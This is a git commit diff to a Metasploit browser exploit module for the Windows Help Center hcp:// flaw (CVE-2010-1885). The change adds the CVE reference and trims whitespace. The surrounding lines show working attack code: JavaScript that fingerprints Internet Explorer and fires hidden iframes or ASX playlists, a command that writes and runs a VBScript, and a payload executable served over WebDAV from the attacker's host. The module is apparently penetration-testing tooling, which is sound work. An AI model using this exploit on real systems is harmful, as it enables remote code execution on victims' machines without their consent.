Add CVE from Kurt S.

git-svn-id: file:///home/svn/framework3/trunk@9484 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/ms10_xxx_helpctr_xss_cmd_exec.rb

@@ -28,11 +28,11 @@ class Metasploit3 < Msf::Exploit::Remote
 					Help and Support Center is the default application provided to access online
 				documentation for Microsoft Windows. Microsoft supports accessing help documents
 				directly via URLs by installing a protocol handler for the scheme "hcp". Due to
-				an error in validation of input to hcp:// combined with a local cross site 
-				scripting vulnerability and a specialized mechanism to launch the XSS trigger, 
+				an error in validation of input to hcp:// combined with a local cross site
+				scripting vulnerability and a specialized mechanism to launch the XSS trigger,
 				arbitrary command execution can be achieved.
 
-				On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog 
+				On IE6 and IE7 on XP SP2 or SP3, code execution is automatic. On IE8, a dialog
 				box pops, but if WMP9 is installed, WMP9 can be used for automatic execution.
 				If IE8 and WMP11, a dialog box will ask the user if execution should continue.
 				Automatic detection of these options is implemented in this module, and will
@@ -47,9 +47,9 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'		=> '$Revision: $',
 			'References'	=>
 				[
-					#[ 'CVE', '2010-xxxx' ],
-					#[ 'MSB', 'MS10-xxx' ],
+					[ 'CVE', 'CVE-2010-1885'],
 					[ 'URL', 'http://lock.cmpxchg8b.com/b10a58b75029f79b5f93f4add3ddf992/ADVISORY' ],
+					#[ 'MSB', 'MS10-xxx' ],
 				],
 			'DefaultOptions' =>
 				{
@@ -78,9 +78,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptString.new(	'URIPATH',		 [ true, "The URI to use.", "/" ])
 				], self.class)
 
-			deregister_options('SSL', 'SSLVersion') # Just for now 
+			deregister_options('SSL', 'SSLVersion') # Just for now
 	end
-		
+
 	def on_request_uri(cli, request)
 
 		# If there is no subdirectory in the request, we need to redirect.
@@ -94,8 +94,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			send_redirect(cli, subdir)
 			return
 		end
-	
-	
+
+
 		case request.method
 		when 'OPTIONS'
 			process_options(cli, request)
@@ -118,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		webdav_loc = "\\\\#{@my_host}\\#{@random_dir}\\#{@payload}"
 
 		@url_base  = "http://" + @my_host
-	
+
 	if request.uri.match(/#{@payload}$/i)
 			print_status "GET for payload received."
 			return if ((p = regenerate_payload(cli)) == nil)
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return
 		end
 
-			
+
 		# ASX Request Inbound
 		if request.uri.match(/#{@asx_file}/)
 			asx = %Q|<ASX VERSION="3.0">
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			write_vbs	= %Q|cmd /c echo #{vbs_content}>%TEMP%\\#{rand_vbs}|
 			launch_vbs  = %Q|cscript %TEMP%\\#{rand_vbs}>nul|
 			concat_cmds = "#{write_vbs}|#{launch_vbs}"
-			
+
 			eval_block  = "Run(String.fromCharCode(#{convert_to_char_code(concat_cmds)}));"
 			task_kill	= "alert(\"foo\");"#"Run(String.fromCharCode(#{convert_to_char_code(task_cmd)}));"
 			eval_block = Rex::Text.uri_encode(Rex::Text.uri_encode(eval_block))
@@ -173,21 +173,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			send_response(cli, help_html, { 'Content-Type' => 'text/html' })
 			return
 		end
-		
+
 		# default initial response
 		js = %Q|
 		var asx = "URLBASE/ASXFILE";
 		var ifr = "URLBASE/IFRFILE";
-	
+
 		function launchiframe(src) {
 			var o = document.createElement("IFRAME");
 			o.setAttribute("width","0");
 			o.setAttribute("height","0");
 			o.setAttribute("frameborder","0");
 			o.setAttribute("src",src);
-			document.body.appendChild(o);	
-		}	
-		
+			document.body.appendChild(o);
+		}
+
 		if (window.navigator.appName == "Microsoft Internet Explorer") {
 			var ua = window.navigator.userAgent;
 			var re  = new RegExp("MSIE ([0-9]{1,}[\.0-9]{0,})");
@@ -209,9 +209,9 @@ class Metasploit3 < Msf::Exploit::Remote
 					if( RUNWITHDIALOG ) {
 						//alert(">WMP9 detected but launching anyway.");
 						o.openPlayer(asx)
-					} else { //alert("IE8 with > WMP9 detected. Will not launch exploit."); 
+					} else { //alert("IE8 with > WMP9 detected. Will not launch exploit.");
 					}
-				} 			
+				}
 			// if ie6 or 7, use iframe
 			} else {
 				//alert("< IE8 detected. Launching via iframe.")
@@ -224,7 +224,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			o.setAttribute("src", ifr);
 			document.body.appendChild(o);
 		}
-|		
+|
 
 		html = %Q|<html><head></head><body><script>JAVASCRIPTFU
 </script>
@@ -334,11 +334,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
-		@random_dir = rand_text_alpha(rand(2)+1) 		
+		@random_dir = rand_text_alpha(rand(2)+1)
 		@asx_file	= rand_text_alpha(rand(2)+1) + ".asx"
 		@start_help	= rand_text_alpha(rand(2)+1) + ".html"
 		@payload	= rand_text_alpha(rand(2)+1) + ".exe"
-		
+
 		if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
 			raise RuntimeError, 'Using WebDAV requires SRVPORT=80 and URIPATH=/'
 		end